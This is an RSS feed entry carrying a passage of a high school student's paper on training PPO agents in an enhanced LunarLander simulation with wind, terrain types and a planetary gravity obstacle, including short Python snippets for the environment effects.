<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Computer Science Archives - Exploratio Journal</title>
	<atom:link href="https://exploratiojournal.com/category/engineering/computer-science/feed/" rel="self" type="application/rss+xml" />
	<link>https://exploratiojournal.com/category/engineering/computer-science/</link>
	<description>Student-edited Academic Publication</description>
	<lastBuildDate>Sat, 06 Dec 2025 22:25:04 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://exploratiojournal.com/wp-content/uploads/2020/07/cropped-Exploratio_icon-1-32x32.png</url>
	<title>Computer Science Archives - Exploratio Journal</title>
	<link>https://exploratiojournal.com/category/engineering/computer-science/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Enhanced Lunar Lander (Autonomous Spacecraft Landing System with Multi-Environmental Challenges)</title>
		<link>https://exploratiojournal.com/enhanced-lunar-lander-autonomous-spacecraft-landing-system-with-multi-environmental-challenges/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=enhanced-lunar-lander-autonomous-spacecraft-landing-system-with-multi-environmental-challenges</link>
		
		<dc:creator><![CDATA[Hireshmi Thirumalaivasan]]></dc:creator>
		<pubDate>Sat, 06 Dec 2025 22:25:01 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<category><![CDATA[Engineering]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4623</guid>

					<description><![CDATA[<p>Hireshmi Thirumalaivasan<br />
John P. Stevens High School</p>
<p>The post <a href="https://exploratiojournal.com/enhanced-lunar-lander-autonomous-spacecraft-landing-system-with-multi-environmental-challenges/">Enhanced Lunar Lander (Autonomous Spacecraft Landing System with Multi-Environmental Challenges)</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img fetchpriority="high" decoding="async" width="958" height="958" src="https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886.jpg" alt="" class="wp-image-4624 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886.jpg 958w, https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886-300x300.jpg 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886-150x150.jpg 150w, https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886-768x768.jpg 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886-230x230.jpg 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886-350x350.jpg 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886-480x480.jpg 480w" sizes="(max-width: 958px) 100vw, 958px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Hireshmi Thirumalaivasan<br><strong>Mentor</strong>: Dr. Bilal Sharqi<br><em>John P. Stevens High School</em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>This research presents a comprehensive study of deep reinforcement learning for lunar landing scenarios, progressing from a basic PPO implementation to an enhanced multi-feature environment. The impact of wind disturbances, terrain variations, and planetary obstacles on landing performance is systematically introduced and analyzed. Through careful parameter tuning and environmental modifications, I demonstrate how PPO agents can successfully navigate complex scenarios while maintaining precision landing between designated flags and avoiding celestial obstacles.</p>



<h2 class="wp-block-heading">1. Introduction</h2>



<p>Autonomous spacecraft landing represents one of the most challenging problems in aerospace engineering and artificial intelligence. This study records the evolution from a basic Lunar Lander environment to a sophisticated multi-environmental system that incorporates realistic physical challenges including atmospheric disturbances, varied terrain topography, and gravitational obstacles.</p>



<p>The research methodology presented follows a systematic approach: starting with a baseline PPO implementation achieving consistent performance in standard conditions, then progressively adding complexity through environmental enhancements while maintaining landing precision and safety requirements.</p>



<h2 class="wp-block-heading">2. Baseline Implementation: Standard Lunar Lander with PPO</h2>



<h4 class="wp-block-heading">2.1. Initial System Architecture</h4>



<p>The foundation of the research begins with a robust PPO implementation for the standard LunarLander-v3 environment:</p>



<figure class="wp-block-image size-large is-resized"><img decoding="async" width="1024" height="776" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-1024x776.png" alt="" class="wp-image-4625" style="width:571px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-1024x776.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-300x227.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-768x582.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-1000x758.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-230x174.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-350x265.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM-480x364.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.57.48-PM.png 1140w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h4 class="wp-block-heading">2.2. Training Infrastructure</h4>



<p>The baseline system incorporates several critical components:</p>



<p>Parallel Environment Training: The implementation utilizes 4 parallel environments to accelerate training and improve sample efficiency:</p>



<figure class="wp-block-image size-large is-resized"><img decoding="async" width="1024" height="494" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-1024x494.png" alt="" class="wp-image-4626" style="width:640px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-1024x494.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-300x145.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-768x370.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-1000x482.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-230x111.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-350x169.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM-480x232.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-9.58.57-PM.png 1476w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h4 class="wp-block-heading">2.3. Baseline Performance Metrics</h4>



<p>The baseline implementation achieved consistent landing success, demonstrating stable convergence over 1,000,000 training timesteps. The system successfully learned to:</p>



<ul class="wp-block-list">
<li>Navigate to the landing zone between designated flags</li>



<li>Control descent velocity for soft landings</li>



<li>Manage fuel consumption efficiently</li>



<li>Maintain stable flight attitudes</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="808" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-1024x808.png" alt="" class="wp-image-4627" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-1024x808.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-300x237.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-768x606.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-1000x789.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-230x181.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-350x276.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM-480x379.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.00.10-PM.png 1268w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading">3. Enhanced Environment Architecture</h2>



<h4 class="wp-block-heading">3.1. System Design Philosophy</h4>



<p>The enhanced system transitions from the standard environment to a comprehensive multi-feature framework. The core enhancement lies in the EnhancedLunarLander class, which wraps the base environment while adding sophisticated environmental challenges: terrain variation, a planetary obstacle, and wind. Refer to Appendix Section 13.1.</p>



<h4 class="wp-block-heading">3.2. Observation Space Enhancement</h4>



<h5 class="wp-block-heading">3.2.1. Base Observation Space (Planet Disabled)</h5>



<p>The base configuration maintains the original LunarLander-v3 observation dimensions, including position (x, y), velocity (vx, vy), angle, angular velocity, and ground contact sensors (left leg, right leg). This provides the fundamental state information for basic landing control without additional environmental complexity. Refer to Appendix Section 13.2 for the standard 8-dimensional observation space.</p>



<h5 class="wp-block-heading">3.2.2. Enhanced Observation Space (Planet Enabled)</h5>



<p>When planet features are enabled, the observation space expands from 8 to 11 dimensions by adding the planet-relative position (x, y) in normalized coordinates and the Euclidean distance to the planet center. This enhancement provides spatial awareness for gravitational obstacle avoidance and navigation planning around the planetary field. Refer to Appendix Section 13.3 for the extended 11-dimensional observation space.</p>



<h5 class="wp-block-heading">3.2.3. Dynamic Observation Augmentation</h5>



<p>The system dynamically calculates and appends planet-related observations during each timestep, including the normalized relative position vector and a scalar distance measurement. This real-time augmentation enables the reinforcement learning agent to develop sophisticated spatial reasoning and collision avoidance strategies while maintaining computational efficiency through selective feature activation. Refer to Appendix Section 13.4 for the runtime observation extension.</p>



<p>This expansion provides the agent with crucial spatial awareness of planetary obstacles, enabling informed navigation decisions.</p>



<h2 class="wp-block-heading">4. Environmental Challenges Implementation</h2>



<h4 class="wp-block-heading">4.1. Wind Disturbance System</h4>



<p>The enhanced lunar lander system implements a sophisticated three-parameter wind disturbance model comprising wind_strength (physics-based force magnitude), max_wind_speed (visualization parameter), and wind_direction (Brownian motion directional changes) to create realistic atmospheric challenges for reinforcement learning-based autonomous landing control.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="369" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-1024x369.png" alt="" class="wp-image-4628" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-1024x369.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-300x108.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-768x277.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-1536x554.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-1000x361.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-230x83.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-350x126.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM-480x173.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.09-PM.png 1664w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="431" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-1024x431.png" alt="" class="wp-image-4629" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-1024x431.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-300x126.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-768x323.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-1536x646.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-1000x421.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-230x97.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-350x147.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM-480x202.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.04.20-PM.png 1730w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="771" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-1024x771.png" alt="" class="wp-image-4630" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-1024x771.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-300x226.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-768x578.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-1536x1157.png 1536w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-1000x753.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-230x173.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-350x264.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM-480x361.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.00-PM.png 1604w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1003" height="1024" src="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-1003x1024.png" alt="" class="wp-image-4631" srcset="https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-1003x1024.png 1003w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-294x300.png 294w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-768x784.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-1000x1021.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-230x235.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-350x357.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM-480x490.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/11/Screenshot-2025-11-16-at-10.05.23-PM.png 1322w" sizes="(max-width: 1003px) 100vw, 1003px" /></figure>



<p><strong>Parameter Independence Discovery</strong></p>



<p><strong>Finding</strong>: max_wind_speed parameter has no impact on learning or performance outcomes&nbsp;</p>



<p><strong>Implication</strong>: Researchers can adjust visualization ranges without affecting experimental validity</p>



<p><strong>Optimal Wind Strength Identification</strong></p>



<p><strong>Finding</strong>: wind_strength = 0.2 provides superior training outcomes compared to 0.1, while wind_strength = 0.3 prevents the lander from landing correctly between the flags, as shown above.</p>



<p><strong>Hypothesis</strong>: Moderate disturbance forces may enhance policy robustness through improved exploration</p>



<p>This comparative analysis demonstrates that wind_strength is the critical parameter for atmospheric disturbance research, while <strong>max_wind_speed</strong> serves purely visualization purposes without affecting learning outcomes or policy performance.</p>



<ul class="wp-block-list">
<li><strong>Wind Direction = 1 Landing Performance</strong></li>



<li><strong>Landing Failure Confirmation</strong>: With self.wind_direction = 1 (57.3° northeast), the lunar lander failed to achieve consistent precision landing between flags, contradicting previous theoretical predictions of direction independence and revealing a critical gap between training performance metrics (259.78 mean reward) and actual landing execution under specific diagonal wind conditions.</li>



<li><strong>Hypothesis Validation Failure</strong>: The systematic testing assumption that Brownian motion (σ=0.1/timestep) would rapidly neutralize initial directional bias proved insufficient for the specific northeast wind vector, suggesting that certain directional combinations of wind_strength=0.2 and wind_direction=1 create persistent drift patterns that exceed the policy&#8217;s learned compensation capabilities during the critical final descent phase.</li>
</ul>



<p><strong><span style="text-decoration: underline;">Wind Force Components with Current Settings:</span></strong></p>



<ul class="wp-block-list">
<li>Horizontal Force: wind_x = 0.2 × cos(1) = +0.108 (eastward drift)</li>



<li>Vertical Force: wind_y = 0.2 × sin(1) = +0.168 (upward force)</li>



<li>Net Effect: Continuous northeast wind pushing the lander away from center (verified numerically below)</li>
</ul>
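<p>These components follow directly from the polar decomposition used in _get_wind_effect() (listed later in this section); a quick numerical check:</p>



<pre class="wp-block-code"><code>import numpy as np

wind_strength = 0.2
wind_direction = 1.0  # radians (about 57.3 degrees)
wind_x = wind_strength * np.cos(wind_direction)  # +0.108 (eastward)
wind_y = wind_strength * np.sin(wind_direction)  # +0.168 (upward)</code></pre>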



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="342" src="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-1024x342.png" alt="" class="wp-image-4670" srcset="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-1024x342.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-300x100.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-768x257.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-1000x334.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-230x77.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-350x117.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM-480x161.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.07.23-PM.png 1274w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>With wind_direction = 0, the lander was able to land correctly between the flags, consistent with Run 3 mentioned above.</p>



<p><strong>Wind Adaptation:</strong> The enhanced agent demonstrates sophisticated compensation strategies:</p>



<ul class="wp-block-list">
<li>Real-time thrust vectoring to counteract wind forces</li>



<li>Predictive adjustments based on wind pattern recognition</li>



<li>Maintained landing precision despite continuous atmospheric disturbances</li>
</ul>



<p>The wind system introduces dynamic atmospheric conditions that affect lander trajectory:</p>



<pre class="wp-block-code"><code>def _get_wind_effect(self):
    if not self.enable_wind:
        return np.zeros(2)
    self.wind_direction += np.random.normal(0, 0.1)  # Wind direction variation
    wind_x = self.wind_strength * np.cos(self.wind_direction)
    wind_y = self.wind_strength * np.sin(self.wind_direction)
    return np.array([wind_x, wind_y])</code></pre>



<p><strong>Key Features:</strong></p>



<ul class="wp-block-list">
<li>Dynamic Direction: Wind direction changes stochastically during flight</li>



<li>Controlled Magnitude: Wind strength parameter (0.2) provides challenging but manageable disturbances</li>



<li>Continuous Application: Forces applied to velocity components at each timestep (see the sketch after this list)</li>
</ul>
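<p>The paper does not list the application code itself; a plausible sketch of how the wrapper's step() could apply the wind vector from _get_wind_effect() (shown above) is given below, under the assumption that wind acts directly on the observed velocity components at indices 2 and 3:</p>



<pre class="wp-block-code"><code>def step(self, action):
    obs, reward, terminated, truncated, info = self.base_env.step(action)
    if self.enable_wind:
        # Assumption: the wind force perturbs the observed velocity
        # components (vx, vy) at each timestep.
        obs[2:4] += self._get_wind_effect()
    return obs, reward, terminated, truncated, info</code></pre>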



<p>Impact on Training: Wind effects require the agent to develop robust control policies that can compensate for external forces while maintaining trajectory precision.</p>



<h4 class="wp-block-heading">4.2 Terrain Variation System</h4>



<p>The Enhanced LunarLander environment implements a comprehensive terrain modification system designed to simulate diverse lunar surface conditions encountered in real-world autonomous spacecraft landing scenarios. This terrain system provides controlled experimental conditions for evaluating reinforcement learning policy robustness across varying surface complexities, enabling systematic analysis of landing performance under different geological conditions. The different terrain types are implemented in the code below.</p>



<p><strong>Terrain Types</strong>:</p>



<ul class="wp-block-list">
<li>Flat: Baseline terrain for standard operations</li>



<li>Rocky: Variable surface heights requiring adaptive landing approaches</li>



<li>Crater: Depressed landing zones testing precision control</li>
</ul>



<p><strong>Detailed Terrain Type Specifications</strong></p>



<ol class="wp-block-list">
<li><strong>Flat Terrain (terrain_type=&#8217;flat&#8217;)</strong></li>
</ol>



<p><strong>Technical Characteristics:</strong></p>



<ul class="wp-block-list">
<li>Modification: No changes applied to observation vector</li>



<li>Ground Sensors: Maintains original LunarLander-v3 contact detection</li>



<li>Reward Multiplier: 1.0x (baseline scaling)</li>



<li>Surface Variation: Zero artificial perturbations</li>
</ul>



<p><strong>Research Application:</strong></p>



<ul class="wp-block-list">
<li>Baseline Control: Provides experimental control condition</li>



<li>Parameter Isolation: Enables pure wind effect analysis</li>



<li>Performance Baseline: Establishes reference performance metrics</li>



<li>Mission Simulation: Represents prepared landing sites with minimal surface variation</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="354" src="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-1024x354.png" alt="" class="wp-image-4671" srcset="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-1024x354.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-300x104.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-768x266.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-1000x346.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-230x80.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-350x121.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM-480x166.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.08.38-PM.png 1306w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>2. <strong>Rocky Terrain (terrain_type=&#8217;rocky&#8217;)</strong></p>



<ol class="wp-block-list"></ol>



<p><strong>Technical Characteristics:</strong></p>



<pre class="wp-block-code"><code>observation[6:8] += np.random.uniform(-0.2, 0.2, 2)</code></pre>



<ul class="wp-block-list">
<li>Surface Variation: Random height perturbations ±0.2 units</li>



<li>Stochastic Nature: Different terrain profile each timestep</li>



<li>Contact Sensors: Both left and right leg sensors affected</li>



<li>Reward Multiplier: 1.5x (increased difficulty compensation)</li>
</ul>



<p><strong>Physical Simulation:</strong></p>



<ul class="wp-block-list">
<li>Surface Roughness: Simulates boulder fields and irregular lunar regolith</li>



<li>Landing Challenge: Requires adaptive leg positioning and balance control</li>



<li>Realistic Conditions: Represents natural lunar surface with minimal preparation</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="333" src="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-1024x333.png" alt="" class="wp-image-4672" srcset="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-1024x333.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-300x98.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-768x250.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-1000x326.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-230x75.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-350x114.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM-480x156.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.09-PM.png 1296w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p><strong>3. Crater Terrain (terrain_type=&#8217;crater&#8217;)</strong></p>



<p><strong>Technical Characteristics:</strong></p>



<pre class="wp-block-code"><code>observation[6:8] -= 0.3</code></pre>



<ul class="wp-block-list">
<li>Consistent Depression: Fixed -0.3 unit offset for both contact sensors</li>



<li>Deterministic Effect: Predictable crater-like landing zone</li>



<li>Surface Geometry: Simulates landing in depression or crater rim</li>



<li>Reward Multiplier: 1.5x (difficulty compensation)</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="319" src="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-1024x319.png" alt="" class="wp-image-4673" srcset="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-1024x319.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-300x93.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-768x239.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-1000x312.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-230x72.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-350x109.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM-480x150.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.09.50-PM.png 1290w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p><strong>Terrain Complexity Hierarchy</strong></p>



<pre class="wp-block-code"><code># Expected difficulty ranking (hypothesis):
terrain_type='flat':   Easiest (100% success rate achieved)
terrain_type='rocky':  Moderate (estimated 80-90% success rate)
terrain_type='crater': Challenging (estimated 70-85% success rate)</code></pre>



<p>This terrain system provides a comprehensive framework for evaluating autonomous lunar landing system performance across realistic surface conditions, supporting both fundamental research in reinforcement learning robustness and practical mission preparation for diverse lunar exploration scenarios.</p>



<p>Three distinct terrain types challenge different aspects of landing performance:</p>



<pre class="wp-block-code"><code>def _modify_terrain(self, observation):
    if self.terrain_type == 'rocky':
        # Add random terrain heights
        observation[6:8] += np.random.uniform(-0.2, 0.2, 2)
    elif self.terrain_type == 'crater':
        # Create a crater effect
        observation[6:8] -= 0.3
    return observation</code></pre>



<h4 class="wp-block-heading">4.3 Planetary Obstacle System</h4>



<p>The planet_gravity parameter controls the magnitude of gravitational attraction between the lunar lander and the planetary obstacle using inverse-square-law physics (force = planet_gravity / distance²).</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="777" src="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-1024x777.png" alt="" class="wp-image-4675" srcset="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-1024x777.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-300x228.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-768x583.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-1000x759.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-230x174.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-350x265.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM-480x364.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.11.49-PM.png 1342w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>The most sophisticated enhancement introduces a gravitational obstacle requiring navigation planning.</p>



